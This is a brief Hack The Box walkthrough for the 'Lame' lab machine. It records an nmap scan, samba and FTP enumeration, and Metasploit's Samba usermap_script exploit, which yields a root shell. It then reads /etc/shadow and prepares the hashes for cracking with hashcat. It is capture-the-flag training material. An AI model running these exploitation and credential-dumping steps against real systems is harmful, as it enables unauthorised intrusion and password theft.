Lame
HTB - 2. Lame
- 1.
nmap -A -T4 -p- 10.10.10.3
takes 144 seconds, 21 (ftp) open with versionvsftpd 2.3.4
and anonymous login allowed, 22 (ssh) open with version4.7p1 Debian 8ubuntu2
, 139 & 445 (samba) open with version 3.0.20-Debian (workgroup: WORKGROUP), 3632 (distccd v1) with version 4.2.4 - 2.Sambasmbclient -L \\\\10.10.10.3\\exitsmbclient -L \\\\10.10.10.3\\tmpexitsmbclient -L \\\\10.10.10.3\\optexitsmbclient -L \\\\10.10.10.3\\ADMIN$Result: Dead end
- 3.FTP Checkftp 10.10.10.3anonymousanonymouslspwdResult: In directory
/
which is empty - 4.Search
samba 3.0.20-debian exploit
: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script and Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) - 5.Metasploit Exploituse exploit/multi/samba/usermap_scriptoptionsset rhosts 10.10.10.3show targetsexploitwhoamihostnamepwdlsupdatedblocate root.txtlocate user.txtcat /root/root.txtcat /home/makis/user.txtcat /etc/passwdcat /etc/shadowunshadow passwd shadowResult: Shell popped and machine owned. Can try to crack passwords with
hashcat
. - 6.Search
vsftpd 2.3.4 exploit
: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor - This is a rapithole; don't continuously try if it doesn't work
Last modified 9mo ago